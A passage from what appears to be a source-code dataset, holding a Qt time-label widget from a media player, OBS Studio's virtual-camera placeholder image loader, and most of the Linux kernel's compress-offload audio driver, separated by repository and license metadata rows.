if( _displayType != TimeLabel::Elapsed )
b_remainingTime = getSettings()->value( "MainWindow/ShowRemainingTime", false ).toBool();
switch( _displayType ) {
case TimeLabel::Elapsed:
setText( " --:-- " );
setToolTip( qtr("Elapsed time") );
break;
case TimeLabel::Remaining:
setText( " --:-- " );
setToolTip( qtr("Total/Remaining time")
+ QString("\n-")
+ qtr("Click to toggle between total and remaining time")
);
break;
case TimeLabel::Both:
setText( " --:--/--:-- " );
setToolTip( QString( "- " )
+ qtr( "Click to toggle between elapsed and remaining time" )
+ QString( "\n- " )
+ qtr( "Double click to jump to a chosen time position" ) );
break;
}
setAlignment( Qt::AlignRight | Qt::AlignVCenter );
CONNECT( THEMIM->getIM(), positionUpdated( float, int64_t, int ),
this, setDisplayPosition( float, int64_t, int ) );
setStyleSheet( "QLabel { padding-left: 4px; padding-right: 4px; }" );
}
void TimeLabel::setDisplayPosition( float pos, int64_t t, int length )
{
if( pos == -1.f )
{
setMinimumSize( QSize( 0, 0 ) );
if( displayType == TimeLabel::Both )
setText( "--:--/--:--" );
else
setText( "--:--" );
return;
}
int time = t / 1000000;
secstotimestr( psz_length, length );
secstotimestr( psz_time, ( b_remainingTime && length ) ? length - time
: time );
// compute the minimum size that will be required for the psz_length
// and use it to enforce a minimal size to avoid "dancing" widgets
QSize minsize( 0, 0 );
if ( length > 0 )
{
QMargins margins = contentsMargins();
minsize += QSize(
fontMetrics().size( 0, QString( psz_length ), 0, 0 ).width(),
sizeHint().height()
);
minsize += QSize( margins.left() + margins.right() + 8, 0 ); /* +padding */
if ( b_remainingTime )
minsize += QSize( fontMetrics().size( 0, "-", 0, 0 ).width(), 0 );
}
switch( displayType )
{
case TimeLabel::Elapsed:
setMinimumSize( minsize );
setText( QString( psz_time ) );
break;
case TimeLabel::Remaining:
if( b_remainingTime )
{
setMinimumSize( minsize );
setText( QString("-") + QString( psz_time ) );
}
else
{
setMinimumSize( QSize( 0, 0 ) );
setText( QString( psz_length ) );
}
break;
case TimeLabel::Both:
default:
QString timestr = QString( "%1%2/%3" )
.arg( QString( (b_remainingTime && length) ? "-" : "" ) )
.arg( QString( psz_time ) )
.arg( QString( ( !length && time ) ? "--:--" : psz_length ) );
setText( timestr );
break;
}
cachedLength = length;
}
void TimeLabel::setDisplayPosition( float pos )
{
if( pos == -1.f || cachedLength == 0 )
{
setText( " --:--/--:-- " );
return;
}
int time = pos * cachedLength;
secstotimestr( psz_time,
( b_remainingTime && cachedLength ?
cachedLength - time : time ) );
QString timestr = QString( "%1%2/%3" )
.arg( QString( (b_remainingTime && cachedLength) ? "-" : "" ) )
.arg( QString( psz_time ) )
.arg( QString( ( !cachedLength && time ) ? "--:--" : psz_length ) );
setText( timestr );
}
void TimeLabel::toggleTimeDisplay()
{
b_remainingTime = !b_remainingTime;
getSettings()->setValue( "MainWindow/ShowRemainingTime", b_remainingTime );
}
| gpl-2.0 |
ZixiVideo/obs-studio | plugins/win-dshow/virtualcam-module/placeholder.cpp | 3 | 2770 | #include <windows.h>
#include <strsafe.h>
#include <gdiplus.h>
#include <stdint.h>
#include <vector>
using namespace Gdiplus;
extern HINSTANCE dll_inst;
static std::vector<uint8_t> placeholder;
static bool initialized = false;
int cx, cy;
/* XXX: optimize this later. or don't, it's only called once. */
static void convert_placeholder(const uint8_t *rgb_in, int width, int height)
{
size_t size = width * height * 3;
size_t linesize = width * 3;
std::vector<uint8_t> yuv_out;
yuv_out.resize(size);
const uint8_t *in = rgb_in;
const uint8_t *end = in + size;
uint8_t *out = &yuv_out[0];
while (in < end) {
const int16_t b = *(in++);
const int16_t g = *(in++);
const int16_t r = *(in++);
*(out++) = (uint8_t)(((66 * r + 129 * g + 25 * b + 128) >> 8) +
16);
*(out++) = (uint8_t)(((-38 * r - 74 * g + 112 * b + 128) >> 8) +
128);
*(out++) = (uint8_t)(((112 * r - 94 * g - 18 * b + 128) >> 8) +
128);
}
placeholder.resize(width * height * 3 / 2);
in = &yuv_out[0];
end = in + size;
out = &placeholder[0];
uint8_t *chroma = out + width * height;
while (in < end) {
const uint8_t *in2 = in + linesize;
const uint8_t *end2 = in2;
uint8_t *out2 = out + width;
while (in < end2) {
int16_t u;
int16_t v;
*(out++) = *(in++);
u = *(in++);
v = *(in++);
*(out++) = *(in++);
u += *(in++);
v += *(in++);
*(out2++) = *(in2++);
u += *(in2++);
v += *(in2++);
*(out2++) = *(in2++);
u += *(in2++);
v += *(in2++);
*(chroma++) = (uint8_t)(u / 4);
*(chroma++) = (uint8_t)(v / 4);
}
in = in2;
out = out2;
}
}
static bool load_placeholder_internal()
{
Status s;
wchar_t file[MAX_PATH];
if (!GetModuleFileNameW(dll_inst, file, MAX_PATH)) {
return false;
}
wchar_t *slash = wcsrchr(file, '\\');
if (!slash) {
return false;
}
slash[1] = 0;
StringCbCat(file, sizeof(file), L"placeholder.png");
Bitmap bmp(file);
if (bmp.GetLastStatus() != Status::Ok) {
return false;
}
cx = bmp.GetWidth();
cy = bmp.GetHeight();
BitmapData bmd = {};
Rect r(0, 0, cx, cy);
s = bmp.LockBits(&r, ImageLockModeRead, PixelFormat24bppRGB, &bmd);
if (s != Status::Ok) {
return false;
}
convert_placeholder((const uint8_t *)bmd.Scan0, cx, cy);
bmp.UnlockBits(&bmd);
return true;
}
bool initialize_placeholder()
{
GdiplusStartupInput si;
ULONG_PTR token;
GdiplusStartup(&token, &si, nullptr);
initialized = load_placeholder_internal();
GdiplusShutdown(token);
return initialized;
}
const uint8_t *get_placeholder_ptr()
{
if (initialized)
return placeholder.data();
return nullptr;
}
const bool get_placeholder_size(int *out_cx, int *out_cy)
{
if (initialized) {
*out_cx = cx;
*out_cy = cy;
return true;
}
return false;
}
| gpl-2.0 |
chadouming/faster-angler | sound/core/compress_offload.c | 3 | 27541 | /*
* compress_core.c - compress offload core
*
* Copyright (C) 2011 Intel Corporation
* Authors: Vinod Koul <vinod.koul@linux.intel.com>
* Pierre-Louis Bossart <pierre-louis.bossart@linux.intel.com>
* ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; version 2 of the License.
*
* This program is distributed in the hope that it will be useful, but
* WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* General Public License for more details.
*
* You should have received a copy of the GNU General Public License along
* with this program; if not, write to the Free Software Foundation, Inc.,
* 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA.
*
* ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
*
*/
#define FORMAT(fmt) "%s: %d: " fmt, __func__, __LINE__
#define pr_fmt(fmt) KBUILD_MODNAME ": " FORMAT(fmt)
#include <linux/file.h>
#include <linux/fs.h>
#include <linux/list.h>
#include <linux/math64.h>
#include <linux/mm.h>
#include <linux/mutex.h>
#include <linux/poll.h>
#include <linux/slab.h>
#include <linux/sched.h>
#include <linux/types.h>
#include <linux/uio.h>
#include <linux/uaccess.h>
#include <linux/module.h>
#include <sound/core.h>
#include <sound/initval.h>
#include <sound/compress_params.h>
#include <sound/compress_offload.h>
#include <sound/compress_driver.h>
/* TODO:
* - add substream support for multiple devices in case of
* SND_DYNAMIC_MINORS is not used
* - Multiple node representation
* driver should be able to register multiple nodes
*/
static DEFINE_MUTEX(device_mutex);
struct snd_compr_file {
unsigned long caps;
struct snd_compr_stream stream;
};
/*
* a note on stream states used:
* we use following states in the compressed core
* SNDRV_PCM_STATE_OPEN: When stream has been opened.
* SNDRV_PCM_STATE_SETUP: When stream has been initialized. This is done by
* calling SNDRV_COMPRESS_SET_PARAMS. running streams will come to this
* state at stop by calling SNDRV_COMPRESS_STOP, or at end of drain.
* SNDRV_PCM_STATE_PREPARED: When snd_compr_write() has been called in
* SNDRV_PCM_STATE_SETUP state. SNDRV_COMPRESS_START can only be called in
* SNDRV_PCM_STATE_PREPARED state.
* SNDRV_PCM_STATE_RUNNING: When stream has been started and is
* decoding/encoding and rendering/capturing data.
* SNDRV_PCM_STATE_DRAINING: When stream is draining current data. This is done
* by calling SNDRV_COMPRESS_DRAIN.
* SNDRV_PCM_STATE_PAUSED: When stream is paused. This is done by calling
* SNDRV_COMPRESS_PAUSE. It can be stopped or resumed by calling
* SNDRV_COMPRESS_STOP or SNDRV_COMPRESS_RESUME respectively.
*/
static int snd_compr_open(struct inode *inode, struct file *f)
{
struct snd_compr *compr;
struct snd_compr_file *data;
struct snd_compr_runtime *runtime;
enum snd_compr_direction dirn;
int maj = imajor(inode);
int ret;
if ((f->f_flags & O_ACCMODE) == O_WRONLY)
dirn = SND_COMPRESS_PLAYBACK;
else if ((f->f_flags & O_ACCMODE) == O_RDONLY)
dirn = SND_COMPRESS_CAPTURE;
else
return -EINVAL;
if (maj == snd_major)
compr = snd_lookup_minor_data(iminor(inode),
SNDRV_DEVICE_TYPE_COMPRESS);
else
return -EBADFD;
if (compr == NULL) {
pr_err("no device data!!!\n");
return -ENODEV;
}
if (dirn != compr->direction) {
pr_err("this device doesn't support this direction\n");
snd_card_unref(compr->card);
return -EINVAL;
}
data = kzalloc(sizeof(*data), GFP_KERNEL);
if (!data) {
snd_card_unref(compr->card);
return -ENOMEM;
}
data->stream.ops = compr->ops;
data->stream.direction = dirn;
data->stream.private_data = compr->private_data;
data->stream.device = compr;
runtime = kzalloc(sizeof(*runtime), GFP_KERNEL);
if (!runtime) {
kfree(data);
snd_card_unref(compr->card);
return -ENOMEM;
}
runtime->state = SNDRV_PCM_STATE_OPEN;
init_waitqueue_head(&runtime->sleep);
data->stream.runtime = runtime;
f->private_data = (void *)data;
mutex_lock(&compr->lock);
ret = compr->ops->open(&data->stream);
mutex_unlock(&compr->lock);
if (ret) {
kfree(runtime);
kfree(data);
}
snd_card_unref(compr->card);
return ret;
}
static int snd_compr_free(struct inode *inode, struct file *f)
{
struct snd_compr_file *data = f->private_data;
struct snd_compr_runtime *runtime = data->stream.runtime;
switch (runtime->state) {
case SNDRV_PCM_STATE_RUNNING:
case SNDRV_PCM_STATE_DRAINING:
case SNDRV_PCM_STATE_PAUSED:
data->stream.ops->trigger(&data->stream,
SNDRV_PCM_TRIGGER_STOP);
break;
default:
break;
}
data->stream.ops->free(&data->stream);
kfree(data->stream.runtime->buffer);
kfree(data->stream.runtime);
kfree(data);
return 0;
}
static int snd_compr_update_tstamp(struct snd_compr_stream *stream,
struct snd_compr_tstamp *tstamp)
{
int err = 0;
if (!stream->ops->pointer)
return -ENOTSUPP;
err = stream->ops->pointer(stream, tstamp);
if (err)
return err;
pr_debug("dsp consumed till %d total %llu bytes\n",
tstamp->byte_offset, tstamp->copied_total);
if (stream->direction == SND_COMPRESS_PLAYBACK)
stream->runtime->total_bytes_transferred = tstamp->copied_total;
else
stream->runtime->total_bytes_available = tstamp->copied_total;
return 0;
}
static size_t snd_compr_calc_avail(struct snd_compr_stream *stream,
struct snd_compr_avail *avail)
{
memset(avail, 0, sizeof(*avail));
snd_compr_update_tstamp(stream, &avail->tstamp);
/* Still need to return avail even if tstamp can't be filled in */
if (stream->runtime->total_bytes_available == 0 &&
stream->runtime->state == SNDRV_PCM_STATE_SETUP &&
stream->direction == SND_COMPRESS_PLAYBACK) {
pr_debug("detected init and someone forgot to do a write\n");
return stream->runtime->buffer_size;
}
pr_debug("app wrote %lld, DSP consumed %lld\n",
stream->runtime->total_bytes_available,
stream->runtime->total_bytes_transferred);
if (stream->runtime->total_bytes_available ==
stream->runtime->total_bytes_transferred) {
if (stream->direction == SND_COMPRESS_PLAYBACK) {
pr_debug("both pointers are same, returning full avail\n");
return stream->runtime->buffer_size;
} else {
pr_debug("both pointers are same, returning no avail\n");
return 0;
}
}
avail->avail = stream->runtime->total_bytes_available -
stream->runtime->total_bytes_transferred;
if (stream->direction == SND_COMPRESS_PLAYBACK)
avail->avail = stream->runtime->buffer_size - avail->avail;
pr_debug("ret avail as %lld\n", avail->avail);
return avail->avail;
}
static inline size_t snd_compr_get_avail(struct snd_compr_stream *stream)
{
struct snd_compr_avail avail;
return snd_compr_calc_avail(stream, &avail);
}
static int
snd_compr_ioctl_avail(struct snd_compr_stream *stream, unsigned long arg)
{
struct snd_compr_avail ioctl_avail;
size_t avail;
avail = snd_compr_calc_avail(stream, &ioctl_avail);
ioctl_avail.avail = avail;
if (copy_to_user((__u64 __user *)arg,
&ioctl_avail, sizeof(ioctl_avail)))
return -EFAULT;
return 0;
}
static int snd_compr_write_data(struct snd_compr_stream *stream,
const char __user *buf, size_t count)
{
void *dstn;
size_t copy;
struct snd_compr_runtime *runtime = stream->runtime;
/* 64-bit Modulus */
u64 app_pointer = div64_u64(runtime->total_bytes_available,
runtime->buffer_size);
app_pointer = runtime->total_bytes_available -
(app_pointer * runtime->buffer_size);
dstn = runtime->buffer + app_pointer;
pr_debug("copying %zu at %lld\n",
count, app_pointer);
if (count < runtime->buffer_size - app_pointer) {
if (copy_from_user(dstn, buf, count))
return -EFAULT;
} else {
copy = runtime->buffer_size - app_pointer;
if (copy_from_user(dstn, buf, copy))
return -EFAULT;
if (copy_from_user(runtime->buffer, buf + copy, count - copy))
return -EFAULT;
}
/* if DSP cares, let it know data has been written */
if (stream->ops->ack)
stream->ops->ack(stream, count);
return count;
}
static ssize_t snd_compr_write(struct file *f, const char __user *buf,
size_t count, loff_t *offset)
{
struct snd_compr_file *data = f->private_data;
struct snd_compr_stream *stream;
size_t avail;
int retval;
if (snd_BUG_ON(!data))
return -EFAULT;
stream = &data->stream;
mutex_lock(&stream->device->lock);
/* write is allowed when stream is running or has been steup */
if (stream->runtime->state != SNDRV_PCM_STATE_SETUP &&
stream->runtime->state != SNDRV_PCM_STATE_PREPARED &&
stream->runtime->state != SNDRV_PCM_STATE_RUNNING) {
mutex_unlock(&stream->device->lock);
return -EBADFD;
}
avail = snd_compr_get_avail(stream);
pr_debug("avail returned %zu\n", avail);
/* calculate how much we can write to buffer */
if (avail > count)
avail = count;
if (stream->ops->copy) {
char __user* cbuf = (char __user*)buf;
retval = stream->ops->copy(stream, cbuf, avail);
} else {
retval = snd_compr_write_data(stream, buf, avail);
}
if (retval > 0)
stream->runtime->total_bytes_available += retval;
/* while initiating the stream, write should be called before START
* call, so in setup move state */
if (stream->runtime->state == SNDRV_PCM_STATE_SETUP) {
stream->runtime->state = SNDRV_PCM_STATE_PREPARED;
pr_debug("stream prepared, Houston we are good to go\n");
}
mutex_unlock(&stream->device->lock);
return retval;
}
static ssize_t snd_compr_read(struct file *f, char __user *buf,
size_t count, loff_t *offset)
{
struct snd_compr_file *data = f->private_data;
struct snd_compr_stream *stream;
size_t avail;
int retval;
if (snd_BUG_ON(!data))
return -EFAULT;
stream = &data->stream;
mutex_lock(&stream->device->lock);
/* read is allowed when stream is running, paused, draining and setup
* (yes setup is state which we transition to after stop, so if user
* wants to read data after stop we allow that)
*/
switch (stream->runtime->state) {
case SNDRV_PCM_STATE_OPEN:
case SNDRV_PCM_STATE_PREPARED:
case SNDRV_PCM_STATE_XRUN:
case SNDRV_PCM_STATE_SUSPENDED:
case SNDRV_PCM_STATE_DISCONNECTED:
retval = -EBADFD;
goto out;
}
avail = snd_compr_get_avail(stream);
pr_debug("avail returned %zu\n", avail);
/* calculate how much we can read from buffer */
if (avail > count)
avail = count;
if (stream->ops->copy) {
retval = stream->ops->copy(stream, buf, avail);
} else {
retval = -ENXIO;
goto out;
}
if (retval > 0)
stream->runtime->total_bytes_transferred += retval;
out:
mutex_unlock(&stream->device->lock);
return retval;
}
static int snd_compr_mmap(struct file *f, struct vm_area_struct *vma)
{
return -ENXIO;
}
static inline int snd_compr_get_poll(struct snd_compr_stream *stream)
{
if (stream->direction == SND_COMPRESS_PLAYBACK)
return POLLOUT | POLLWRNORM;
else
return POLLIN | POLLRDNORM;
}
static unsigned int snd_compr_poll(struct file *f, poll_table *wait)
{
struct snd_compr_file *data = f->private_data;
struct snd_compr_stream *stream;
size_t avail;
int retval = 0;
if (snd_BUG_ON(!data))
return -EFAULT;
stream = &data->stream;
if (snd_BUG_ON(!stream))
return -EFAULT;
mutex_lock(&stream->device->lock);
if (stream->runtime->state == SNDRV_PCM_STATE_PAUSED ||
stream->runtime->state == SNDRV_PCM_STATE_OPEN) {
retval = -EBADFD;
goto out;
}
poll_wait(f, &stream->runtime->sleep, wait);
avail = snd_compr_get_avail(stream);
pr_debug("avail is %zu\n", avail);
/* check if we have at least one fragment to fill */
switch (stream->runtime->state) {
case SNDRV_PCM_STATE_DRAINING:
/* stream has been woken up after drain is complete
* draining done so set stream state to stopped
*/
retval = snd_compr_get_poll(stream);
stream->runtime->state = SNDRV_PCM_STATE_SETUP;
break;
case SNDRV_PCM_STATE_RUNNING:
case SNDRV_PCM_STATE_PREPARED:
case SNDRV_PCM_STATE_PAUSED:
if (avail >= stream->runtime->fragment_size)
retval = snd_compr_get_poll(stream);
break;
default:
if (stream->direction == SND_COMPRESS_PLAYBACK)
retval = POLLOUT | POLLWRNORM | POLLERR;
else
retval = POLLIN | POLLRDNORM | POLLERR;
break;
}
out:
mutex_unlock(&stream->device->lock);
return retval;
}
static int
snd_compr_get_caps(struct snd_compr_stream *stream, unsigned long arg)
{
int retval;
struct snd_compr_caps caps;
if (!stream->ops->get_caps)
return -ENXIO;
memset(&caps, 0, sizeof(caps));
retval = stream->ops->get_caps(stream, &caps);
if (retval)
goto out;
if (copy_to_user((void __user *)arg, &caps, sizeof(caps)))
retval = -EFAULT;
out:
return retval;
}
static int
snd_compr_get_codec_caps(struct snd_compr_stream *stream, unsigned long arg)
{
int retval;
struct snd_compr_codec_caps *caps;
if (!stream->ops->get_codec_caps)
return -ENXIO;
caps = kzalloc(sizeof(*caps), GFP_KERNEL);
if (!caps)
return -ENOMEM;
retval = stream->ops->get_codec_caps(stream, caps);
if (retval)
goto out;
if (copy_to_user((void __user *)arg, caps, sizeof(*caps)))
retval = -EFAULT;
out:
kfree(caps);
return retval;
}
/* revisit this with snd_pcm_preallocate_xxx */
static int snd_compr_allocate_buffer(struct snd_compr_stream *stream,
struct snd_compr_params *params)
{
unsigned int buffer_size;
void *buffer;
buffer_size = params->buffer.fragment_size * params->buffer.fragments;
if (stream->ops->copy) {
buffer = NULL;
/* if copy is defined the driver will be required to copy
* the data from core
*/
} else {
buffer = kmalloc(buffer_size, GFP_KERNEL);
if (!buffer)
return -ENOMEM;
}
stream->runtime->fragment_size = params->buffer.fragment_size;
stream->runtime->fragments = params->buffer.fragments;
stream->runtime->buffer = buffer;
stream->runtime->buffer_size = buffer_size;
return 0;
}
static int snd_compress_check_input(struct snd_compr_params *params)
{
/* first let's check the buffer parameter's */
if (params->buffer.fragment_size == 0 ||
params->buffer.fragments > INT_MAX / params->buffer.fragment_size)
return -EINVAL;
/* now codec parameters */
if (params->codec.id == 0 || params->codec.id > SND_AUDIOCODEC_MAX)
return -EINVAL;
if (params->codec.ch_in == 0 || params->codec.ch_out == 0)
return -EINVAL;
return 0;
}
static int
snd_compr_set_params(struct snd_compr_stream *stream, unsigned long arg)
{
struct snd_compr_params *params;
int retval;
if (stream->runtime->state == SNDRV_PCM_STATE_OPEN) {
/*
* we should allow parameter change only when stream has been
* opened not in other cases
*/
params = kmalloc(sizeof(*params), GFP_KERNEL);
if (!params)
return -ENOMEM;
if (copy_from_user(params, (void __user *)arg, sizeof(*params))) {
retval = -EFAULT;
goto out;
}
retval = snd_compress_check_input(params);
if (retval)
goto out;
retval = snd_compr_allocate_buffer(stream, params);
if (retval) {
retval = -ENOMEM;
goto out;
}
retval = stream->ops->set_params(stream, params);
if (retval)
goto out;
stream->metadata_set = false;
stream->next_track = false;
if (stream->direction == SND_COMPRESS_PLAYBACK)
stream->runtime->state = SNDRV_PCM_STATE_SETUP;
else
stream->runtime->state = SNDRV_PCM_STATE_PREPARED;
} else {
return -EPERM;
}
out:
kfree(params);
return retval;
}
static int
snd_compr_get_params(struct snd_compr_stream *stream, unsigned long arg)
{
struct snd_codec *params;
int retval;
if (!stream->ops->get_params)
return -EBADFD;
params = kzalloc(sizeof(*params), GFP_KERNEL);
if (!params)
return -ENOMEM;
retval = stream->ops->get_params(stream, params);
if (retval)
goto out;
if (copy_to_user((char __user *)arg, params, sizeof(*params)))
retval = -EFAULT;
out:
kfree(params);
return retval;
}
static int
snd_compr_get_metadata(struct snd_compr_stream *stream, unsigned long arg)
{
struct snd_compr_metadata metadata;
int retval;
if (!stream->ops->get_metadata)
return -ENXIO;
if (copy_from_user(&metadata, (void __user *)arg, sizeof(metadata)))
return -EFAULT;
retval = stream->ops->get_metadata(stream, &metadata);
if (retval != 0)
return retval;
if (copy_to_user((void __user *)arg, &metadata, sizeof(metadata)))
return -EFAULT;
return 0;
}
static int
snd_compr_set_metadata(struct snd_compr_stream *stream, unsigned long arg)
{
struct snd_compr_metadata metadata;
int retval;
if (!stream->ops->set_metadata)
return -ENXIO;
/*
* we should allow parameter change only when stream has been
* opened not in other cases
*/
if (copy_from_user(&metadata, (void __user *)arg, sizeof(metadata)))
return -EFAULT;
retval = stream->ops->set_metadata(stream, &metadata);
stream->metadata_set = true;
return retval;
}
static inline int
snd_compr_tstamp(struct snd_compr_stream *stream, unsigned long arg)
{
struct snd_compr_tstamp tstamp;
int ret;
memset(&tstamp, 0, sizeof(tstamp));
ret = snd_compr_update_tstamp(stream, &tstamp);
if (ret == 0)
ret = copy_to_user((struct snd_compr_tstamp __user *)arg,
&tstamp, sizeof(tstamp)) ? -EFAULT : 0;
return ret;
}
static int snd_compr_pause(struct snd_compr_stream *stream)
{
int retval;
if (stream->runtime->state != SNDRV_PCM_STATE_RUNNING)
return -EPERM;
retval = stream->ops->trigger(stream, SNDRV_PCM_TRIGGER_PAUSE_PUSH);
if (!retval)
stream->runtime->state = SNDRV_PCM_STATE_PAUSED;
return retval;
}
static int snd_compr_resume(struct snd_compr_stream *stream)
{
int retval;
if (stream->runtime->state != SNDRV_PCM_STATE_PAUSED)
return -EPERM;
retval = stream->ops->trigger(stream, SNDRV_PCM_TRIGGER_PAUSE_RELEASE);
if (!retval)
stream->runtime->state = SNDRV_PCM_STATE_RUNNING;
return retval;
}
static int snd_compr_start(struct snd_compr_stream *stream)
{
int retval;
if (stream->runtime->state != SNDRV_PCM_STATE_PREPARED)
return -EPERM;
retval = stream->ops->trigger(stream, SNDRV_PCM_TRIGGER_START);
if (!retval)
stream->runtime->state = SNDRV_PCM_STATE_RUNNING;
return retval;
}
static int snd_compr_stop(struct snd_compr_stream *stream)
{
int retval;
if (stream->runtime->state == SNDRV_PCM_STATE_PREPARED ||
stream->runtime->state == SNDRV_PCM_STATE_SETUP)
return -EPERM;
retval = stream->ops->trigger(stream, SNDRV_PCM_TRIGGER_STOP);
if (!retval) {
stream->runtime->state = SNDRV_PCM_STATE_SETUP;
wake_up(&stream->runtime->sleep);
stream->runtime->total_bytes_available = 0;
stream->runtime->total_bytes_transferred = 0;
}
return retval;
}
/* this fn is called without lock being held and we change stream states here
* so while using the stream state auquire the lock but relase before invoking
* DSP as the call will possibly take a while
*/
static int snd_compr_drain(struct snd_compr_stream *stream)
{
int retval;
mutex_lock(&stream->device->lock);
if (stream->runtime->state == SNDRV_PCM_STATE_PREPARED ||
stream->runtime->state == SNDRV_PCM_STATE_SETUP) {
retval = -EPERM;
goto ret;
}
mutex_unlock(&stream->device->lock);
retval = stream->ops->trigger(stream, SND_COMPR_TRIGGER_DRAIN);
mutex_lock(&stream->device->lock);
if (!retval) {
stream->runtime->state = SNDRV_PCM_STATE_DRAINING;
wake_up(&stream->runtime->sleep);
}
ret:
mutex_unlock(&stream->device->lock);
return retval;
}
static int snd_compr_next_track(struct snd_compr_stream *stream)
{
int retval;
/* only a running stream can transition to next track */
if (stream->runtime->state != SNDRV_PCM_STATE_RUNNING)
return -EPERM;
/* you can signal next track isf this is intended to be a gapless stream
* and current track metadata is set
*/
if (stream->metadata_set == false)
return -EPERM;
retval = stream->ops->trigger(stream, SND_COMPR_TRIGGER_NEXT_TRACK);
if (retval != 0)
return retval;
stream->metadata_set = false;
stream->next_track = true;
return 0;
}
static int snd_compr_partial_drain(struct snd_compr_stream *stream)
{
int retval;
mutex_lock(&stream->device->lock);
if (stream->runtime->state == SNDRV_PCM_STATE_PREPARED ||
stream->runtime->state == SNDRV_PCM_STATE_SETUP) {
mutex_unlock(&stream->device->lock);
return -EPERM;
}
mutex_unlock(&stream->device->lock);
/* stream can be drained only when next track has been signalled */
if (stream->next_track == false)
return -EPERM;
retval = stream->ops->trigger(stream, SND_COMPR_TRIGGER_PARTIAL_DRAIN);
stream->next_track = false;
return retval;
}
static int snd_compr_set_next_track_param(struct snd_compr_stream *stream,
unsigned long arg)
{
union snd_codec_options codec_options;
int retval;
/* set next track params when stream is running or has been setup */
if (stream->runtime->state != SNDRV_PCM_STATE_SETUP &&
stream->runtime->state != SNDRV_PCM_STATE_RUNNING)
return -EPERM;
if (copy_from_user(&codec_options, (void __user *)arg,
sizeof(codec_options)))
return -EFAULT;
retval = stream->ops->set_next_track_param(stream, &codec_options);
if (retval != 0)
return retval;
return 0;
}
static int snd_compress_simple_ioctls(struct file *file,
struct snd_compr_stream *stream,
unsigned int cmd, unsigned long arg)
{
int retval = -ENOTTY;
switch (_IOC_NR(cmd)) {
case _IOC_NR(SNDRV_COMPRESS_IOCTL_VERSION):
retval = put_user(SNDRV_COMPRESS_VERSION,
(int __user *)arg) ? -EFAULT : 0;
break;
case _IOC_NR(SNDRV_COMPRESS_GET_CAPS):
retval = snd_compr_get_caps(stream, arg);
break;
case _IOC_NR(SNDRV_COMPRESS_GET_CODEC_CAPS):
retval = snd_compr_get_codec_caps(stream, arg);
break;
case _IOC_NR(SNDRV_COMPRESS_TSTAMP):
retval = snd_compr_tstamp(stream, arg);
break;
case _IOC_NR(SNDRV_COMPRESS_AVAIL):
retval = snd_compr_ioctl_avail(stream, arg);
break;
/* drain and partial drain need special handling
* we need to drop the locks here as the streams would get blocked on
* the dsp to get drained. The locking would be handled in respective
* function here
*/
case _IOC_NR(SNDRV_COMPRESS_DRAIN):
retval = snd_compr_drain(stream);
break;
case _IOC_NR(SNDRV_COMPRESS_PARTIAL_DRAIN):
retval = snd_compr_partial_drain(stream);
break;
}
return retval;
}
static long snd_compr_ioctl(struct file *f, unsigned int cmd, unsigned long arg)
{
struct snd_compr_file *data = f->private_data;
struct snd_compr_stream *stream;
int retval = -ENOTTY;
if (snd_BUG_ON(!data))
return -EFAULT;
stream = &data->stream;
if (snd_BUG_ON(!stream))
return -EFAULT;
mutex_lock(&stream->device->lock);
switch (_IOC_NR(cmd)) {
case _IOC_NR(SNDRV_COMPRESS_SET_PARAMS):
retval = snd_compr_set_params(stream, arg);
break;
case _IOC_NR(SNDRV_COMPRESS_GET_PARAMS):
retval = snd_compr_get_params(stream, arg);
break;
case _IOC_NR(SNDRV_COMPRESS_SET_METADATA):
retval = snd_compr_set_metadata(stream, arg);
break;
case _IOC_NR(SNDRV_COMPRESS_GET_METADATA):
retval = snd_compr_get_metadata(stream, arg);
break;
case _IOC_NR(SNDRV_COMPRESS_PAUSE):
retval = snd_compr_pause(stream);
break;
case _IOC_NR(SNDRV_COMPRESS_RESUME):
retval = snd_compr_resume(stream);
break;
case _IOC_NR(SNDRV_COMPRESS_START):
retval = snd_compr_start(stream);
break;
case _IOC_NR(SNDRV_COMPRESS_STOP):
retval = snd_compr_stop(stream);
break;
case _IOC_NR(SNDRV_COMPRESS_NEXT_TRACK):
retval = snd_compr_next_track(stream);
break;
case _IOC_NR(SNDRV_COMPRESS_SET_NEXT_TRACK_PARAM):
retval = snd_compr_set_next_track_param(stream, arg);
break;
default:
mutex_unlock(&stream->device->lock);
return snd_compress_simple_ioctls(f, stream, cmd, arg);
}
mutex_unlock(&stream->device->lock);
return retval;
}
static const struct file_operations snd_compr_file_ops = {
.owner = THIS_MODULE,
.open = snd_compr_open,
.release = snd_compr_free,
.write = snd_compr_write,
.read = snd_compr_read,
.unlocked_ioctl = snd_compr_ioctl,
.compat_ioctl = snd_compr_ioctl,
.mmap = snd_compr_mmap,
.poll = snd_compr_poll,
};
static int snd_compress_dev_register(struct snd_device *device)
{
int ret = -EINVAL;
char str[16];
struct snd_compr *compr;
if (snd_BUG_ON(!device || !device->device_data))
return -EBADFD;
compr = device->device_data;
sprintf(str, "comprC%iD%i", compr->card->number, compr->device);
pr_debug("reg %s for device %s, direction %d\n", str, compr->name,
compr->direction);
/* register compressed device */
ret = snd_register_device(SNDRV_DEVICE_TYPE_COMPRESS, compr->card,
compr->device, &snd_compr_file_ops, compr, str);
if (ret < 0) {
pr_err("snd_register_device failed\n %d", ret);
return ret;
}
return ret;
}
static int snd_compress_dev_disconnect(struct snd_device *device)
{
struct snd_compr *compr;
compr = device->device_data;
snd_unregister_device(SNDRV_DEVICE_TYPE_COMPRESS, compr->card,
compr->device);
return 0;
}
/*
* snd_compress_new: create new compress device
* @card: sound card pointer
* @device: device number
* @dirn: device direction, should be of type enum snd_compr_direction
* @compr: compress device pointer
*/
int snd_compress_new(struct snd_card *card, int device,
int dirn, struct snd_compr *compr)
{
static struct snd_device_ops ops = {
.dev_free = NULL,
.dev_register = snd_compress_dev_register,
.dev_disconnect = snd_compress_dev_disconnect,
};
compr->card = card;
compr->device = device;
compr->direction = dirn;
return snd_device_new(card, SNDRV_DEV_COMPRESS, compr, &ops);
}
EXPORT_SYMBOL_GPL(snd_compress_new);
/*
* snd_compress_free: free compress device
* @card: sound card pointer
* @compr: compress device pointer
*/
